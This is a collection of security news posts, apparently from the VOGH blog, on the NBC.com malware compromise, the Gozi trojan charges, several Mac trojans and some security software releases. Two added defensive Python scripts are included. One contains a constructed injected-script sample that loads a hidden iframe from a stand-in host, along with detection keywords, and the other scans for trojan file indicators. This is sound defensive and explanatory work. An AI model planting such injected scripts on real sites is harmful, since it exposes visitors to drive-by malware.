
NBC.com Compromised, Hackers Exploited The Website to Spread Malware


The month of February is going from bad to worse in the cyber domain: within this one month cyber criminals have breached the defences of giants such as Facebook, Twitter, Apple and the New York Times, among others. But the game is not over yet. Only a few weeks after the attack on the NY Times, in which the employee database was stolen, the cyber criminals have targeted another media giant, the National Broadcasting Company, widely known as NBC. During the attack, hackers gained access to NBC's server and planted malware in order to harm innocent readers. Security expert and blogger Brian Krebs said that the hackers inserted code into the NBC.com homepage, which caused visiting browsers to load pages from third-party sites that had themselves been compromised. Explaining the nature of the attack, Krebs said: "The compromised sites tried to foist the Citadel Trojan, a variant of the Zeus Trojan." Zeus is a "sophisticated data theft tool that steals passwords and allows attackers to control machines remotely," he added. Not only NBC's home page was affected; several other pages were too, including those of late-night talk show hosts Jay Leno and Jimmy Fallon. The well-known security firm Sophos explained roughly how the attack played out and how NBC got sucked into the equation:
  • NBC's hacked pages were altered to add some malicious JavaScript that ran in your browser.
  • The JavaScript injected an additional HTML component known as an IFRAME (inline frame) into the web page.
  • The IFRAME sucked in further malicious content from websites infected with an exploit kit known as RedKit.
  • The exploit kit delivered one of two exploit files to try to take control over your browser via a Java vulnerability or a PDF bug.
  • If the exploit worked on your computer, financially-related crimeware from the Citadel or ZeroAccess families was installed.
This, of course, is an example of a dreaded drive-by download, where the crooks use a cascade of tricks to download, install and execute software without going through any of the warnings or confirmation dialogs you might expect. This, in turn, means that even if you are a careful and well-informed user, you may end up in trouble, since there are no obvious signs that you are doing anything risky, or even unexpected.
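As an added, defender-side example (not code from VOGH, Sophos or Krebs), the following Python script shows how the first two stages of the cascade above can be spotted in a saved copy of a page: it flags iframes that point off-site or are hidden/zero-sized, and inline scripts that build an iframe at runtime. The sample HTML, the site host `www.example-news.test` and the `landing.invalid` host are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _TagCollector(HTMLParser):
    """Collects <iframe> start tags and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # list of attribute dicts, one per <iframe>
        self.inline_scripts = []   # source text of each inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "script" and "src" not in attrs:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline_scripts.append("".join(self._buf))


def _is_hidden(attrs):
    """Zero/one-pixel frames or CSS-hidden frames: the visitor never sees them."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        width = int(attrs.get("width", "100").rstrip("px"))
        height = int(attrs.get("height", "100").rstrip("px"))
    except ValueError:
        return False
    return width <= 1 or height <= 1


def _is_third_party(src, site_host):
    """True when the frame source lives on a host other than the site or its subdomains."""
    host = urlparse(src).hostname
    if host is None:
        return False
    return host != site_host and not host.endswith("." + site_host)


def find_suspicious_iframes(html, site_host):
    """Return [(src, [reasons])] for iframes that are off-site and/or hidden."""
    parser = _TagCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        if _is_third_party(src, site_host):
            reasons.append("third-party src")
        if _is_hidden(attrs):
            reasons.append("hidden/zero-size")
        if reasons:
            findings.append((src, reasons))
    return findings


def find_iframe_writing_scripts(html):
    """Return inline scripts that create an iframe at runtime (the injection stage)."""
    parser = _TagCollector()
    parser.feed(html)
    hits = []
    for script in parser.inline_scripts:
        low = script.lower()
        if "iframe" in low and any(k in low for k in ("document.write", "createelement", "innerhtml")):
            hits.append(script.strip())
    return hits


# Constructed sample: one legitimate video frame plus an injected script and its hidden frame.
SAMPLE_PAGE = """<html><body>
<h1>Tonight's line-up</h1>
<iframe src="https://www.example-news.test/video/player" width="640" height="360"></iframe>
<script>
  // injected snippet (constructed for this example): builds a hidden off-site frame
  var f = document.createElement('iframe');
  f.src = 'http://landing.invalid/in.php';
  f.width = 0; f.height = 0;
  document.body.appendChild(f);
</script>
<iframe src="http://landing.invalid/in.php" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, "www.example-news.test"):
        print("suspicious iframe:", src, reasons)
    for script in find_iframe_writing_scripts(SAMPLE_PAGE):
        print("iframe-writing script:\n", script)
```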
As soon as the story got spotted, the American commercial broadcasting television network NBC News reported and confirmed that its site had been attacked. The broadcaster released the following statement regarding the website: "We've identified the problem and are working to resolve it. No user information has been compromised."
The emergency response team immediately took the situation under control, restored the website and confirmed that the site is back and completely safe for its visitors. So far there is no evidence pointing to the attackers behind this incident. For the safety of VOGH readers we recommend updating your operating system and browser plugins. Note also that the attack on NBC was similar to many that have occurred in recent years in that the malicious sites tried to exploit vulnerabilities in Java, so it is better to disable Java unless you really need it. Stay tuned with VOGH and be safe in the cyber domain.







3 Russian Cyber Criminals Who Were The Masterminds of Banking Trojan 'Gozi' Charged in New York


Yet another serious cyber crime case has been resolved: the FBI tracked down the masterminds of the infamous 'Gozi' banking Trojan, which infected more than a million systems worldwide, including a handful at NASA, leading to tens of millions of dollars in lost banking funds and damage to computer systems and networks. Three alleged international cyber criminals, responsible for creating and distributing Gozi, which infected over one million computers and caused tens of millions of dollars in losses, have been charged in Manhattan Federal Court. Mihai Ionut Paunescu, 28, a Romanian, Deniss Calovskis, 27, a Latvian, and Nikita Vladimirovich Kuzmin, 25, of the Russian Federation, are charged with computer intrusion, conspiracy to commit bank and wire fraud, and access device fraud. Federal authorities said the three were arrested last week; Kuzmin is being held in New York, while Paunescu is in custody in Romania and Calovskis in Latvia.
According to the FBI press release, Deniss Calovskis, a/k/a "Miami," a Latvian national who allegedly wrote some of the computer code that made the Gozi virus so effective, was arrested in Latvia in November 2012. Mihai Ionut Paunescu, a/k/a "Virus," a Romanian national who allegedly ran a "bulletproof hosting" service that enabled cyber criminals to distribute the Gozi virus, the Zeus trojan and other notorious malware and to conduct other sophisticated cyber crimes, was arrested in Romania in December 2012.

The cases are being handled by the Complex Frauds Unit of the United States Attorney’s Office. Assistant United States Attorneys Sarah Lai, Nicole Friedlander, and Thomas G.A. Brown, along with Trial Attorney Carol Sipperly of the Computer Crime and Intellectual Property Section of the Department of Justice on the Paunescu case, are in charge of the prosecution. The charges contained in the Indictments are merely accusations, and the defendants are presumed innocent unless and until proven guilty.

Defendant            | Age and Residence      | Charges                                                                                                                                                                              | Maximum Penalty
Nikita Kuzmin        | 25; Moscow, Russia     | Conspiracy to commit bank fraud; bank fraud; conspiracy to commit access device fraud; access device fraud; conspiracy to commit computer intrusion; computer intrusion               | 95 years in prison
Deniss Calovskis     | 27; Riga, Latvia       | Conspiracy to commit bank fraud; conspiracy to commit access device fraud; conspiracy to commit computer intrusion; conspiracy to commit wire fraud; conspiracy to commit aggravated identity theft | 67 years in prison
Mihai Ionut Paunescu | 28; Bucharest, Romania | Conspiracy to commit computer intrusion; conspiracy to commit bank fraud; conspiracy to commit wire fraud                                                                            | 60 years in prison


Brief About Gozi:-
The Gozi virus is malicious computer code, or “malware,” that steals personal bank account information, including usernames and passwords, from the users of affected computers. It was named by private sector information security experts in the U.S. who, in 2007, discovered that previously unrecognized malware was stealing personal bank account information from computers across Europe on a vast scale, while remaining virtually undetectable in the computers it infected. To date, the Gozi virus has infected over one million victim computers worldwide, among them at least 40,000 computers in the U.S., including computers belonging to the National Aeronautics and Space Administration (NASA), as well as computers in Germany, Great Britain, Poland, France, Finland, Italy, Turkey, and elsewhere, and it has caused tens of millions of dollars in losses to the individuals, businesses, and government entities whose computers were infected.

The Gozi virus was distributed to victims’ computers in several different ways. In one method, the virus was disguised as an apparently benign .pdf document which, when opened, secretly installed the Gozi virus on the victim’s computer. Once installed, the Gozi virus—which was intentionally designed to be undetectable by anti-virus software—collected data from the infected computer in order to capture personal bank account information including usernames and passwords. That data was then transmitted to various computer servers controlled by the cyber criminals who used the Gozi virus. These cyber criminals then used the personal bank account information to transfer funds out of the victims’ bank accounts and ultimately into their own personal possession.





'Dockster' A New Mac Malware Targeting Apple Users Found on Dalai Lama Related Website


Researchers at the F-Secure blog have identified a new piece of malicious software targeted at Apple users on a website dedicated to the Dalai Lama. According to the F-Secure blog post, the Dalai Lama-related website is fully compromised and is pushing new Mac malware, called Dockster, using a Java-based exploit. Dockster tries to infect computers by exploiting a vulnerability in Java, CVE-2012-0507, the same one used by the Flashback malware, which first appeared around September 2011 and infected as many as 600,000 computers via a drive-by download. Flashback was used to fraudulently click on advertisements in order to generate illicit revenue, a type of scam known as click fraud. Apple patched the Java vulnerability in early April and then undertook a series of steps to remove the frequently targeted application from Macs. Apple stopped bundling Java in version 10.7 of its Lion operating system, a policy that continued with the company's Mountain Lion release. In October, Apple removed older Java browser plug-ins in a software update.
The matter of relief is that current versions of OS X are not vulnerable; users who have disabled the Java browser plug-in are also not vulnerable. F-Secure researcher Sean Sullivan said Dockster is "a basic backdoor with file download and keylogger capabilities." Sullivan also said that the Dalai Lama's site is serving a Windows-based exploit for CVE-2012-4681, delivering the Agent.AXMO Trojan. The Trojan exploits a Java vulnerability that allows remote code execution using a malicious applet capable of bypassing the Java SecurityManager.

Please note that the gyalwarinpoche.com site doesn't seem to be as "official" as dalailama.com.

While talking about Mac malware, remember that Mac users have faced such attacks before: the Mac Trojan OSX.SabPub spread through Java exploits; in 2011 the OSX/Revir-B Trojan was installed behind a PDF, giving hackers remote access to Mac computers; besides Revir-B, the Linux Tsunami Trojan called "Kaiten" targeted Mac OS users in 2011; and another piece of malware named "Devil Robber" made Mac users victims by stealing their personal information. In the very recent past we saw a Trojan named 'BackDoor.Wirenet.1' apparently providing its masters with a backdoor into infected systems; it is also capable of stealing passwords stored in browsers such as Chrome, Chromium, Firefox and Opera. For any kind of cyber updates and infosec news, stay tuned with VOGH.






Kaspersky Releases Linux Mail Security With Anti-malware, Anti-spam & Content Filtering


Russian anti-virus firm and security giant Kaspersky Lab has released an anti-spam and anti-malware application called Linux Mail Security, which can be integrated into different types of Linux-based mail servers to fight spam and block malicious attachments. The latest spam-fighting features, including Reputation Filtering and the Enforced Anti-Spam Updates Service, help filter out zero-hour spam, while the new ZetaShield technology helps shield businesses from zero-day and targeted attacks. Designed for integration with a range of Linux-based mail systems, Kaspersky Linux Mail Security delivers the security, flexibility and ease of management that businesses and ISPs demand.

Key Features:-
  • Advanced antivirus engine- Kaspersky Linux Mail Security includes the latest version of Kaspersky Lab's award-winning antivirus engine – with behaviour stream signatures – to help detect and remove malicious attachments from incoming emails.
  • Zero-Day Exploit and Targeted Attack (ZETA) Shield- Kaspersky's ZetaShield offers protection against unknown malware and exploits – to defend you from zero-day and zero-hour attacks and APTs (Advanced Persistent Threats).
  • Powerful Anti-Spam Engine- Kaspersky Linux Mail Security provides the latest version of Kaspersky's anti-spam engine – including two powerful new technologies:
      • Enforced Anti-Spam Updates Service – uses push technology, directly from the Kaspersky cloud, to deliver real-time updates. By reducing the 'update window' from 20 minutes to approximately 1 minute, the Enforced Anti-Spam Updates Service helps to defend businesses against zero-hour spam and spam epidemics.
      • Cloud-assisted Reputation Filtering – fights against unknown spam, to enhance the spam capture rate and reduce the number of false positives.
  • Kaspersky Security Network- The cloud-based Kaspersky Security Network (KSN) gathers data from millions of participating users' systems around the world to help defend your system from the very latest viruses and malware attacks. Potential threats are monitored and analysed – in real time – to help block dangerous actions before harm is caused.
  • Attachment filtering- The new Format Recogniser feature can filter attachments – using information about file type, name and message size. This helps businesses to enforce their email usage policy and can help to address corporate liability issues that can arise when users try to distribute illegal music or video files via the corporate email system.
  • Global Blacklists and Whitelists (improved)- In addition to creating corporate blacklists or whitelists, administrators can manage 'allowed' or 'denied' sender emails – using IPv4 and IPv6, wildcards and regular expressions.
  • Personal Blacklists and Whitelists- Users can also create their own blacklists and whitelists.
  • Backup and personal backup with flexible search- Blocked email is quarantined in a backup system. If the system uses Microsoft Active Directory or OpenLDAP, individual users can access their personal backup via the web, so they're less likely to need to call your helpdesk.
  • Integration with most popular MTAs (Postfix, Sendmail, Exim, qmail and CommunigatePro)- Kaspersky Linux Mail Security lets you select the method of integration, depending on your choice of Mail Transfer Agent (MTA) – so you can integrate as a filter or using a Milter API.
  • Antivirus command line file scanner- The Kaspersky Anti-Virus On-Demand Scanner can be used for on-demand virus checking of objects – which can include directories, regular files and devices such as hard drives, flash drives and DVD-ROMs.
  • Amavisd-new- Kaspersky Linux Mail Security supports integration with Linux mail systems using the high-performance AMaViS interface.
  • Monitoring and Reporting features-
      • SNMP (Simple Network Management Protocol) support – any type of event can be monitored using SNMP events and traps
      • A new dashboard gives an at-a-glance view of status and monitoring
      • Detailed, flexible reporting in PDF format – for customisable reports that help in the monitoring and analysis of security and policies
      • Notification system – informs administrators and document owners about policy violation incidents
      • Detailed logs – on all product actions, to help in identifying problems
  • Easy to deploy, maintain and manage-
      • System administrators can run manual updates or set the rules for fully automatic updates of antivirus, anti-spam and ZetaShield
      • Integration with Active Directory and OpenLDAP
      • Rich email traffic management rules – administrators can create rules according to corporate security policies
      • IPv6 support
      • Scalable architecture – the entire system can be easily migrated from a test server to a production environment
Kaspersky Linux Mail Security will support the following Linux distributions: Red Hat Enterprise Linux 6.2 Server, Fedora 16, SUSE Linux Enterprise Server 11 SP2, Debian GNU/Linux 6.0.4 Squeeze, CentOS 6.2, openSUSE Linux 12.1, Ubuntu 10.04 LTS and 12.04 LTS, Mandriva Enterprise Server 5.2, FreeBSD 8.3 and 9.0, Canaima 3.0, Asianux 4 SP1.






'BackDoor.Wirenet.1' Trojan Stealing Passwords From Mac & Linux Based Systems



The Russian anti-virus software company Dr. Web has spotted a piece of malware that, unusually, targets Macs and Linux-based systems and is causing a world of trouble for those in its path. The newly found malware, dubbed 'BackDoor.Wirenet.1', apparently provides its masters with a backdoor into infected systems. It is also capable of stealing passwords stored in browsers like Chrome, Chromium, Firefox and Opera. Furthermore, it is able to obtain passwords from popular applications including SeaMonkey, Pidgin and Thunderbird. Even if you don't use any of the above-mentioned software, you're still in danger, as a keylogger is bundled in the payload. Wirenet.1 installs itself into the user's home directory using the name WIFIADAPT.

There are some steps that can be taken right away if you think you could be infected. Dr. Web is quick to point out that its anti-virus software will keep you protected. Another option is to simply block communication with the control server used by the code's author; in this case, blocking communication with the IP address 212.7.208.65 should do the trick.

Earlier also Mac users faced such attacks: the Mac Trojan OSX.SabPub spread through Java exploits; in 2011 we also saw the OSX/Revir-B Trojan installed behind a PDF, giving hackers remote access to Mac computers; besides Revir-B, the Linux Tsunami Trojan called "Kaiten" targeted Mac OS users in 2011; and another piece of malware named "Devil Robber" made Mac users victims by stealing their personal information.





KDE 4.9 Released With Improved Stability & Performance


Earlier in January we got KDE 4.8, so after eight months of waiting the KDE developer team has now announced its latest set of releases, providing major updates to KDE Plasma Workspaces, KDE Applications and the KDE Platform. Version 4.9 provides many new features, along with improved stability and performance. This release is dedicated to the memory of KDE contributor Claire Lotion. Claire's vibrant personality and enthusiasm were an inspiration to many in the open source community, as was her pioneering work on the format. The KDE Quality Team was set up earlier this year with the goal of improving the general level of quality and stability in KDE software. Special attention was given to identifying and fixing regressions from previous releases. This was a top priority because it ensures improvement with each release. As a result of the efforts of the KDE Quality Team, the 4.9 releases are the best ever.
One particular bugfix deserves special attention. An Okular bug reported in 2007 had gathered nearly 1100 votes; it was important to many users, who complained about making annotations and not being able to save or print them. With the assistance of many commenters and people on the Okular IRC channel, Fabio D'Urso implemented a solution that allows Okular PDF document annotations to be saved and printed. The fix required some work on the KDE libraries and attention to overall design to ensure that non-PDF documents worked right.

The most notable include:-
  • The Dolphin file manager includes back and forward buttons, inline file renaming, and the ability to show metadata like ratings, tags, image size, file size, date, and more. You can also sort files by these metadata properties, which is awesome. It also includes a better Places panel, improved search, and better integration with the Terminal.
  • The Konsole terminal now includes the ability to change directory when you drag and drop a folder into the window, detach tabs by dragging them out of the window, and more.
  • Activities, the feature that helps you separate your work from your play, is now a bit more powerful, letting you link certain files to each workspace. You can also encrypt certain activities for more private work.
  • The KWin window manager now has better performance all around, as well as a few improvements here and there with certain effects like Wobby Windows.


-Source (KDE & lh)







OpenVAS Vulnerability Scanning & Management Tool Version 5 Released With New Asset-Management, Delta-Reports & Embedded SCAP-Data

The OpenVAS project development team has announced the availability of version 5 of its open source vulnerability assessment system. Almost one year after OpenVAS-4, the fifth version of the tool for vulnerability scanning and management offers several new features. At the same time the number of freely available vulnerability checks has increased to over 25,000.

New Features:-
  • Delta reports to analyse differences between two scans.
  • Security Information Database: Integrated SCAP data (CPE, CVE) including update method via feed service.
  • Integrated Asset Management.
  • Configuration object 'Port Lists' for transparent TCP/UDP port ranges.
  • Prognostic scans based on asset data and current SCAP data.
  • Support for individual time zones for users.
  • Support for observers (granting read-only access).
  • Support for notes/overrides lifetimes.
  • Trashcan for collecting removed items before ultimate deletion.
  • Container tasks for importing reports.
  • SSH port for Local Security Checks configurable.
  • Product detections as reported by the Scanner are handled to allow detailed cross-referenced detection information.
  • Support for sorting results by CVSS score.
  • Support for importing results sent through the XML escalator.
  • Support for escalating result to a Sourcefire Defense Center.
  • Support for using an SSH key pair for SSH authentication.
  • Individual user settings, starting with time zone.
  • Display single result details.
  • Icon indicators for detected operating systems.
  • LDAP per-user authentication method.
Improved Features:-
  • Updated builtin Report Format Plugins HTML, Text and LaTeX/PDF to reflect various new features that are already present in GSA, including delta and prognostic reports.
  • Product detection information in results XML.
  • Performance for massive scanner results by using transaction groups.
  • Import of Target lists to allow comma-separated, line-by-line lists.
  • Support for large database files on 32-bit platforms.
Changed Features:-
  • The user interface design of the web interface has been updated.
  • Report format signatures no longer contain user-editable fields. Thus, users can change comments without losing validity of plugins.
  • The max_host and max_checks scan performance parameters have been moved from scan configs to tasks.
  • Security: Enforces strict permissions on sensitive OpenVAS Manager files.
  • Security: Drop privileges before executing report format plugins if running with elevated privileges. 
Source code and binaries for OpenVAS-5 are available to download from the project's site. 




LibreOffice 3.5.3 Final Arrives, 60+ Bugs Have Been Fixed


The Document Foundation announces LibreOffice 3.5.3, the fourth version of the 3.5 family. LibreOffice 3.5.3 provides additional stability to corporate and individual users of the best free office suite ever. As expected, the new stable release adds no new features, instead fixing more than 60 bugs found in the core of the program. These include problems when importing PDF, PPTX, RTF and DOCX files, as well as a crashing bug.
Highlighted Features:-
  • Calc performance improvements
  • Lightproof improvements
  • Collaborative spreadsheet editing using Telepathy
  • A Microsoft Publisher import filter
  • A signed PDF export
  • A smartphone remote control
  • A new UI for picking templates
  • A Java based GUI for an Android viewer
  • An improved Impress SVG export filter
  • Tooling for more and better tests
The distribution for Windows is an international build, so you can choose the user interface language you prefer. Help content is available via an online service, or alternatively as a separate install. Windows users who have a LibreOffice version prior to 3.4.5 installed should either uninstall it beforehand or upgrade to 3.4.5; otherwise, the upgrade to 3.5.2 may fail. LibreOffice contains all the security fixes from OpenOffice.org 3.3.0, and perhaps more as a side-effect of the code clean-ups. Microsoft Office 2010 will complain that ODF 1.2 and extended documents written by LibreOffice 3.5 are invalid (but still opens them). This is a shortcoming of MSO2010, which supports only ODF 1.1; please see here for further details.




Anontune - New Social Music Platform By #Anonymous


After the launch of AnonBin, an alternative to PasteBin, the hacktivist group is reportedly putting together a social music platform that will surely ruffle the RIAA's feathers. The project is called Anontune and is designed to pull songs from third-party sources like YouTube. Users can throw the songs into playlists and share them with friends. The Anontune service relies on executing a Java applet. "Unless you are extremely trusting or using VMWare, you should think very carefully about running code on your machine that was written by members of Anonymous,"

They insist that Anontune will not host copyrighted material and will not be streaming music or offering downloads of copyrighted material. Instead, they plan to focus on information, and they compare the platform to a search engine. "The information can be used to play and centralize pervasive music across the Internet on one platform." It's unclear exactly how this site will operate, but Anonymous seems to think that the law will be on their side this time. "The idea is that if all songs were easily accessible and centralized on one user-friendly platform that it would be possible to hijack all current users of music piracy solutions," Anonymous writes in an Anontune white paper (pdf).




Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers


The massive Flashback botnet that hit more than 60K Macs worldwide originated from hacked and malware-rigged WordPress blog sites. Researchers estimate that between 30,000 and 100,000 WordPress sites were infected in late February and early March, 85% of them in the United States.
Kaspersky Lab researchers say the infected WordPress blog sites were rigged with code that silently redirected visitors to a malicious server. "When the connection was made to the malicious server, that server would determine which OS was running and serve exploits accordingly," says Roel Schouwenberg, senior researcher for Kaspersky. It was a pay-per-install scheme to spread malware, including the Flashback Trojan.
Most researchers say a gradual decline in machines infected by the Trojan is still underway: as of Thursday, there were about 140,000 infected Macs still out there, according to Symantec, and Kaspersky says it sees only about 30,629 Flashback-infected bots in its sinkhole. Still on the horizon, too, is the possibility of a Flashback comeback, with the command-and-control servers sending their bots updates. "We are watching the command-and-control domains used to control this botnet for any updates ... We haven't seen any new updates being delivered," said Liam O Murchu, manager of operations for Symantec Security Response. "Flashback generates new domains every day, which shows us the attackers have probably written malicious code before. They are aware that their botnet could be taken down with a single domain, so they generate a new one every day."


Earlier also Mac users faced such attacks: the Mac Trojan OSX.SabPub spread through Java exploits; in 2011 we also saw the OSX/Revir-B Trojan installed behind a PDF, giving hackers remote access to Mac computers; besides Revir-B, the Linux Tsunami Trojan called "Kaiten" targeted Mac OS users in 2011; and another piece of malware named "Devil Robber" made Mac users victims by stealing their personal information.





Another Mac Trojan "Backdoor.OSX.SabPub" Discovered, Exploiting Java Vulnerability

A few weeks ago security experts found that the Flashback Trojan had infected more than 60,000 Mac users around the world, and immediately after this incident Apple issued patches to curb the vulnerability. Now yet another Mac Trojan has been found that also spreads through Java exploits. The malware, called Backdoor.OSX.SabPub, can take screenshots of a user's current session, execute commands on an infected machine and connect to a remote website to transmit the data. It is not clear how users get infected with the Trojan, but because of the low number of instances and the Trojan's backdoor functionality, Securelist speculates that it is most likely used in targeted attacks, possibly launched through emails containing a URL pointing to one of two websites hosting the exploit. Two versions of SabPub were discovered in the wild this past weekend, having flown undetected for about two months. Kaspersky's Costin Raiu wrote in a blog post that SabPub was probably written by the LuckyCat authors.
Version 1: Microsoft Office
One version of SabPub traps Mac (and potentially Windows) users with booby-trapped Microsoft Word documents which exploit the vulnerability 'MSWord.CVE-2009-00563.a.'
The spear-phishing emails contain a malicious Word attachment entitled '10thMarch Statemnet' (typo in the original) sent to Tibet sympathizers. March 10, 2011 refers to the day the Dalai Lama delivered his annual speech observing the Tibetan Uprising of 1959. The Word doc was created in August 2010 and updated in February with SabPub thrown in; "quite normal" for such attacks and seen in other APTs like Duqu, Raiu notes.
Version 2: Java
A March version of SabPub, also discovered last weekend, exploits the same drive-by Java vulnerability seen in Flashback, one of the biggest botnet attacks seen on OS X. Once the backdoor Trojan is downloaded, the victim's system connects to a command-and-control server via HTTP. From there the botnet can grab screenshots, upload/download files and remotely execute commands, Sophos' Graham Cluley writes. SabPub drops the following two files on a user's system, so if you are concerned about infection Cluley recommends searching for these files:
/Users//Library/Preferences/com.apple.PubSabAgent.pfile
/Users//Library/LaunchAgents/com.apple.PubSabAGent.plist
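As an added example (not code from Sophos, Securelist or VOGH), this Python script turns the two SabPub file indicators above into a check over every home directory and, since it is the same kind of check, also covers the WIFIADAPT name that the BackDoor.Wirenet.1 post says the Trojan installs into the user's home directory. The directory tree it scans is constructed in a temporary folder; on a real Mac you would point scan_users_root at /Users.

```python
import tempfile
from pathlib import Path

# Indicator paths relative to each user's home directory, taken from the two posts:
# the files SabPub drops (per Cluley) and Wirenet.1's install name (per Dr. Web).
INDICATORS = {
    "SabPub": [
        "Library/Preferences/com.apple.PubSabAgent.pfile",
        "Library/LaunchAgents/com.apple.PubSabAGent.plist",
    ],
    "Wirenet.1": ["WIFIADAPT"],
}


def check_home(home):
    """Return (family, path) for every indicator present under one home directory."""
    home = Path(home)
    found = []
    for family, rel_paths in INDICATORS.items():
        for rel in rel_paths:
            candidate = home / rel
            if candidate.exists():
                found.append((family, str(candidate)))
    return found


def list_launch_agents(home):
    """Names of all per-user LaunchAgents, the persistence location SabPub's plist uses;
    anything here the user does not recognise deserves a closer look."""
    agents_dir = Path(home) / "Library" / "LaunchAgents"
    if not agents_dir.is_dir():
        return []
    return sorted(p.name for p in agents_dir.glob("*.plist"))


def scan_users_root(users_root):
    """Scan every home directory below users_root (/Users on OS X, /home on Linux)."""
    root = Path(users_root)
    if not root.is_dir():
        return []
    results = []
    for home in sorted(p for p in root.iterdir() if p.is_dir()):
        results.extend(check_home(home))
    return results


def build_demo_tree():
    """Constructed fixture: three fake homes, one with the SabPub files, one with WIFIADAPT, one clean."""
    base = Path(tempfile.mkdtemp(prefix="ioc_demo_"))
    for rel in INDICATORS["SabPub"]:
        target = base / "alice" / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text("placeholder")
    (base / "bob").mkdir()
    (base / "bob" / "WIFIADAPT").write_text("placeholder")
    (base / "carol" / "Library" / "LaunchAgents").mkdir(parents=True)
    return base


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for family, path in scan_users_root(demo_root):
        print(f"{family}: {path}")
    print("alice's LaunchAgents:", list_launch_agents(demo_root / "alice"))
```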

Earlier also Mac users faced such attacks: the OSX/Revir-B Trojan was installed behind a PDF, giving hackers remote access to Mac computers; besides Revir-B, the Linux Tsunami Trojan called "Kaiten" targeted Mac OS users in 2011; and another piece of malware named "Devil Robber" made Mac users victims by stealing their personal information.


-Source (Securelist & PC Mag)





Cyber-War 2.0!! Bangladeshi Hackers Again Targeting Indian Cyber Fence


Last month almost every media outlet was busy covering the story of the cyber-war between Bangladesh and India. The readers of VOGH got full coverage of that issue. The earlier attack caused maximum damage to India (NIC, BSF, Stock Market, media, government sites, political parties' websites and many other important and high-profile sites), because all the attacks were coming from the Bangladeshi side. Later the hackers from BD stopped the attack and unofficially postponed the cyber-war. In our magazine we exposed the untold story of the entire issue. Being a media outlet, we did our job to raise awareness and, as expected, we got maximum support from the peace lovers of both countries.
But now Bangladesh Cyber Army has restarted the so-called cyber-war, or you can call it Cyber-War 2.0. In our magazine we criticised that very issue at length, but it seems BCA either did not have much time to go through that PDF or is just continuing the same bullshit stuff for negative publicity (the main object of this entire issue). So yet again they have hit more than 55 Indian sites to resend their message to the Indian Govt and the Indian hacker communities.

VOGH Review:- 
But like before we are again standing against this issue, because we know what these hackers are looking for and what the main object of engaging in cyber attacks is: a fake publicity stunt, or you can say negative publicity. While fulfilling their bloody object they are just harassing and disturbing cyber space, which indeed causes serious problems for common people.



Flashback.G Trojan Targeting Mac Users While Stealing Passwords

Remember that earlier Mac Security Blog reported that the latest version, Flashback.D, had gotten a bit sneakier. First, it checks to see whether the user is running Mac OS X in VMware Fusion. If so, it does not execute. It does this because many malware researchers test malware in virtual machines, rather than infecting full installations, as it is easier to delete them and start over with clean copies. This means that security researchers analyzing and looking for this malware need to be running regular Macs.
Yet again Mac users have become the victims of another trojan. This new Trojan is capable of infecting their computers and stealing passwords to services such as Google, PayPal, online banking and so on. The virus uses a new installation method. When a user visits a crafted web page, the new variant either tries to exploit two old security vulnerabilities or deploys a Java applet which tries to trick the user into believing it has been certified by Apple. According to Mac Security Blog (Intego):- This new variant of the Flashback Trojan horse uses three methods to infect Macs. The malware first tries to install itself using one of two Java vulnerabilities. If this is successful, users will be infected with no intervention. If these vulnerabilities are not available – if the Macs have Java up to date – then it attempts a third method of installation, trying to fool users through a social engineering trick. The applet displays a self-signed certificate, claiming to be issued by Apple. Most users won't understand what this means, and click on Continue to allow the installation to continue.
It is worth noting that Flashback.G will not install if VirusBarrier X6 is present, or if a number of other security programs are installed on the Mac in question. It does this to avoid detection. It seems that the malware writers feel it is best to avoid Macs where the malware might be detected, and focus on the many that aren't protected.
Mac users have faced such attacks before: the OSX/Revir-B trojan was installed behind a PDF and gave hackers remote access to Mac computers; the Linux Tsunami trojan called "Kaiten" targeted Mac OS users in 2011; and another malware named "Devil Robber" also made Mac users its victims by stealing their personal information.




VOGH Release III | CYb3r-W4r #Unseen & #Uncut -3rd Magazine Of Voice of Greyhat


Cyber-War Cyber-War Cyber-War!!! I am sure that all of you must be bored of hearing this term so many times. For the last couple of weeks the cyber-war between Bangladesh and India was at its highest point. Not only security experts and hackers but also those who do not belong to this world became aware of what was going on. After seeing so much drama we decided to make the scenario clear in front of all of you. So VOGH has published its third magazine, named "VOGH Release III | CYb3r-W4r #Unseen & #Uncut".

VOGH Release III | CYb3r-W4r #Unseen & #Uncut Contents:- 
  • Introduction
  • Brief Of Cyber-War & Hidden Object of It
  • Redirection
  • An Unexpected End
  • Summary
  • Responsibility Of Media
  • Responsibility Of Government 
  • VOGH Message to Every Hackers Of the World



 



Nessus 5.0 Vulnerability Scanner Released


Tenable Network Security officially announced the availability of Nessus 5.0 vulnerability scanner. This release introduces key features and improvements, separated into the four major phases of the vulnerability scanning process:
  1. Installation and management (for enhanced usability)
  2. Scan policy creation and design (for improved effectiveness)
  3. Scan execution (for improved efficiency)
  4. Report customization and creation (for improved communication with all parts of the organization).
Installation & Management:-
Nessus 5.0 simplifies the installation and configuration for non-technical users:
  • Installation: Nessus v5.0 has a browser-based installation wizard — no special knowledge required. Users on a wide variety of platforms — Windows, Mac, Linux, or UNIX — can have Nessus v5.0 installed within minutes.
  • Configuration and management: Nessus v5.0 configuration and management is now done 100% through the GUI.
  • With all configuration and management now done through the web interface, the Nessus user experience is the same for all users, regardless of OS.
  • With the touch of a button on the GUI, Nessus users can now quickly initiate plugin updates and see last update information.

Scan Policy Creation & Design:-
Users now enjoy improved effectiveness when creating scan policies:
